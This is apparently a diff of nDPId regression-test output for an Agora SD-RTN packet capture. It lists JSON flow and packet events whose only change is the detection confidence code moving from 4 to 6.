00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1649098879721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879721,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/xAAD8RLJLAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1649098909723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909723,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSNAAD8RHDfAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1649098909723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909723,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSRAAD8RHDbAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1649098909724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909724,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSVAAD8RHDXAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvBAAD8RmZ\/AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvFAAD8RmZ7AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvJAAD8RmZ3AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098879720,"flow_last_seen":1649098879767,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098849713,"flow_last_seen":1649098849898,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3135,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098879720,"flow_last_seen":1649098879767,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098849713,"flow_last_seen":1649098849898,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3135,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":285,"total-skipped-flows":0,"total-l4-payload-len":65673,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":18,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":112,"global_ts_msec":1649336870173} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1649336870173,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870173,"pkt":"eJS0JASgYDjgxTWgCABFoAEFneZAAD8Rl3TAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1649336870173,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870173,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnedAAD8Rl3PAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1649336870176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870176,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnehAAD8Rl3LAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi1AAD8RYIXAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi5AAD8RYITAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi9AAD8RYIPAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649099059734,"flow_last_seen":1649099059780,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3162,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098909723,"flow_last_seen":1649098909909,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3103,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 